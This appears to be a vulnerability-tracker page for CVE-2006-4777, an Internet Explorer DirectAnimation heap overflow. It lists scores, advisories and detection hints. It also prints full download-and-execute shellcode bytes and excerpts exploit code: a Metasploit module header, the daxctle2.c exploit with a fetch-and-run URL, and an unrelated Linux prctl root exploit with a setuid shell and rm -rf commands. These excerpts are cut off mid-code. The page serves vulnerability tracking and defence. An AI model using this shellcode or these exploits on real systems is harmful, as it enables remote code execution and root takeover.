CVE-2006-4777
published 2006-09-14CVE-2006-4777: Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese…
PriorityP269high7.6CVSS 2.0
AVNACHAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
78.75%
99.5th percentile
Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | ie | — | — |
| microsoft | ie | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f\x70
- →Detect instantiation of the vulnerable DirectAnimation.PathControl ActiveX COM object (CLSID daxctle.ocx) in HTML/script content, particularly followed by calls to the KeyFrame method. ↗
- →Monitor for creation or loading of daxctle.ocx by iexplore.exe processes, especially on Windows 2000/XP/2003 systems running IE 6.0 SP1. ↗
- ·The vulnerability is reported to affect primarily Chinese Windows distributions; exploitation reliability on other locales may vary. ↗
- ·The Metasploit module payload space is constrained to 870 bytes by heaplib; payloads exceeding this size will not function correctly. ↗
- ·Exploitation on Windows XP SP2 CN requires luck due to heap layout unpredictability; the exploit is more reliable on Windows 2000 Server SP4 CN. ↗
- ·This CVE is a different vulnerability from CVE-2006-4446, though both affect daxctle.ocx; detection rules should not conflate the two. ↗
CVSS provenance
nvdv2.07.6HIGHAV:N/AC:H/Au:N/C:C/I:C/A:C
vulncheck5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h8xv-8m4r-fp4f: Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2006-4777 [MEDIUM] CWE-119 GHSA-h8xv-8m4r-fp4f: Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation
Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446.
GHSA
GHSA-3m9w-44xv-rc3v: Multiple unspecified vulnerabilities in DirectAnimation ActiveX controls for Microsoft Internet Explorer 5
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2006-5884 [MEDIUM] GHSA-3m9w-44xv-rc3v: Multiple unspecified vulnerabilities in DirectAnimation ActiveX controls for Microsoft Internet Explorer 5
Multiple unspecified vulnerabilities in DirectAnimation ActiveX controls for Microsoft Internet Explorer 5.01 through 6 have unknown impact and remote attack vectors, possibly related to (1) Danim.dll and (2) Lmrt.dll, a different set of vulnerabilities than CVE-2006-4446 and CVE-2006-4777.
VulnCheck
Microsoft Internet Explorer Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2006·CVSS 5.0
CVE-2006-4777 [MEDIUM] Microsoft Internet Explorer Improper Restriction of Operations within the Bounds of a Memory Buffer
Microsoft Internet Explorer Improper Restriction of Operations within the Bounds of a Memory Buffer
Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446.
Affected: Microsoft Internet Explorer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
exploitdb·2010-07-16
CVE-2006-4777 Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
---
##
# $Id: ms06_067_keyframe.rb 9842 2010-07-16 02:33:25Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
# :ua_minver => "6.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :vuln_test => 'KeyFrame',
# :classid => 'DirectAnimation.PathControl',
# :rank => NormalRanking # reliable memory corruption
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Daxctle.OCX
Exploit-DB
Microsoft Internet Explorer - COM Object Remote Heap Overflow
exploitdb·2006-09-13
CVE-2006-4777 Microsoft Internet Explorer - COM Object Remote Heap Overflow
Microsoft Internet Explorer - COM Object Remote Heap Overflow
---
/*
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server SP4 CN
* : + Internet Explorer 6.0 SP1
* : Windows XP SP2 CN
* : + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
* :
* Complie : cl daxctle2.c
* :
* Usage :d:\>daxctle2
* :
* :Usage: daxctle [htmlfile]
* :
* :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
* :
*
*/
#include
#include
FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;
// Download Exec Shellcode by nop
unsigned char sc[] =
"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)
exploitdb·2006-07-14
CVE-2006-2451 Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)
Linux Kernel 2.6.13 /tmp/getsuid.c
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsui
Metasploit
MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
metasploit
MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
This module exploits a heap overflow vulnerability in the KeyFrame method of the direct animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov.
No writeups or analysis indexed.
http://secunia.com/advisories/21910http://securityreason.com/securityalert/1577http://securitytracker.com/id?1016854http://www.kb.cert.org/vuls/id/377369http://www.microsoft.com/technet/security/advisory/925444.mspxhttp://www.osvdb.org/28842http://www.securityfocus.com/archive/1/445898/100/0/threadedhttp://www.securityfocus.com/archive/1/446065/100/0/threadedhttp://www.securityfocus.com/archive/1/446084/100/0/threadedhttp://www.securityfocus.com/archive/1/446085/100/0/threadedhttp://www.securityfocus.com/archive/1/446246/100/0/threadedhttp://www.securityfocus.com/bid/20047http://www.us-cert.gov/cas/techalerts/TA06-318A.htmlhttp://www.vupen.com/english/advisories/2006/3593http://www.xsec.org/index.php?module=releases&act=view&type=2&id=20https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-067https://exchange.xforce.ibmcloud.com/vulnerabilities/28942https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1103http://secunia.com/advisories/21910http://securityreason.com/securityalert/1577http://securitytracker.com/id?1016854http://www.kb.cert.org/vuls/id/377369http://www.microsoft.com/technet/security/advisory/925444.mspxhttp://www.osvdb.org/28842http://www.securityfocus.com/archive/1/445898/100/0/threadedhttp://www.securityfocus.com/archive/1/446065/100/0/threadedhttp://www.securityfocus.com/archive/1/446084/100/0/threadedhttp://www.securityfocus.com/archive/1/446085/100/0/threadedhttp://www.securityfocus.com/archive/1/446246/100/0/threadedhttp://www.securityfocus.com/bid/20047http://www.us-cert.gov/cas/techalerts/TA06-318A.htmlhttp://www.vupen.com/english/advisories/2006/3593http://www.xsec.org/index.php?module=releases&act=view&type=2&id=20https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-067https://exchange.xforce.ibmcloud.com/vulnerabilities/28942https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1103
2006-09-14
Published
Exploited in the wild